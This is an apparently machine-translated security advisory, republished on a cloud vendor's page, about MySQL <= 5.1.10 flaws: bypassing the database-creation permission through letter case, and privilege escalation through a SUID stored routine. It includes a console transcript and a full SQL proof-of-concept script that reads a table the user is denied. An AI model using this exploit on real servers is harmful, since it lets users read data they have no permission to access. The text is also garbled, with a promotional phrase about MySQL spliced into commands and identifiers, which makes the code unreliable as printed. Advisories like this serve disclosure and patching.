Discussion on MySQL permission escalation and security restrictions

Source: Internet
Author: User

The following articles mainly describe the actual application of MySQL permission escalation and security restriction bypass vulnerabilities. I saw the actual application of MySQL permission escalation and security restriction bypass vulnerabilities on the relevant website a few days ago, I think it's good. I will share it with you today.

Affected Systems:

MySQL (the best combination with PHP) AB MySQL (the best combination with PHP) <= 5.1.10

Description:

Bugtraq id: 19559

MySQL (the best combination with PHP) is a widely used open-source relational database system with running versions on various platforms.

In MySQL (the best combination with PHP), users with access permissions but no creation permissions can create new databases that are only different from those with names and letters. Successful exploitation of this vulnerability requires that the file system running MySQL (the best combination with PHP) support case-sensitive file names.

In addition, because the suid routine parameters are calculated in the wrong security environment, attackers can execute arbitrary DML statements with the permissions of the routine definer through stored routines. Successful attacks require you to have the EXECUTE permission on the stored routines.

Test method:

Warning: The following procedures (methods) may be offensive and only for security research and teaching. Users are at your own risk !]

1. Create a database

 
 
  1. $ MySQL (the best combination with PHP)-h my. MySQL (the best combination with PHP). server-u sample-p-A sample
  2. Enter password:
  3. Welcome to the MySQL (the best combination with PHP) monitor. Commands end with; or \ g.
  4. Your MySQL (best combination with PHP) connection id is 263935 to server version: 4.1.16-standard
  5. MySQL (the best combination with PHP)> create database another;
  6. ERROR 1044: Access denied for user 'sample' @ '%' to database 'another'
  7. MySQL (the best combination with PHP)> create database sAmple;
  8. Query OK, 1 row affected (0.00 sec)

2. Permission Improvement

 
 
  1. -- Disable_warnings
  2. Drop database if exists MySQL (the best combination with PHP) test1;
  3. Drop database if exists MySQL (the best combination with PHP) test2;
  4. Drop function if exists f_suid;
  5. -- Enable_warnings
  6. # Prepare playground
  7. Create database MySQL (the best combination with PHP) test1;
  8. Create database MySQL (the best combination with PHP) test2;
  9. Create user malory @ localhost;
  10. Grant all privileges on MySQL (the best combination with PHP) test1. * to malory @ localhost;
  11. # Create harmless (but SUID !) Function
  12. Create function f_suid (I int) returns int return 0;
  13. Grant execute on function test. f_suid to malory @ localhost;
  14. Use MySQL (the best combination with PHP) test2;
  15. # Create table in which malory @ localhost will be interested but to which
  16. # He won't have any access
  17. Create table t1 (I int );
  18. Connect (malcon, localhost, malory, MySQL (the best combination with PHP) test1 );
  19. # Correct malory @ localhost don't have access to MySQL (the best combination with PHP) test2.t1
  20. -- Error ER_TABLEACCESS_DENIED_ERROR
  21. Select * from MySQL (the best combination with PHP) test2.t1;
  22. # Create function which will allow to exploit security hole
  23. Delimiter |;
  24. Create function f_edevil ()
  25. Returns int
  26. SQL security invoker
  27. Begin
  28. Set @ a: = current_user ();
  29. Set @ B: = (select count (*) from MySQL (the best combination with PHP) test2.t1 );
  30. Return 0;
  31. End |
  32. Delimiter; |
  33. # Again correct
  34. -- Error ER_TABLEACCESS_DENIED_ERROR
  35. Select f_edevil ();
  36. Select @ a, @ B;
  37. # Oops !!! It seems that f_edevil () is executed in the context
  38. # F_suid () definer, so malory @ locahost gets all info that he wants
  39. Select test. f_suid (f_edevil ());
  40. Select @ a, @ B;
  41. Connection default;
  42. Drop user malory @ localhost;
  43. Drop database MySQL (the best combination with PHP) test1;
  44. Drop database MySQL (the best combination with PHP) test2;

Suggestion:

Vendor patch: MySQL (the best combination with PHP) AB. Currently, the vendor has released an upgrade patch to fix this security problem. Please download it from the vendor's homepage.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.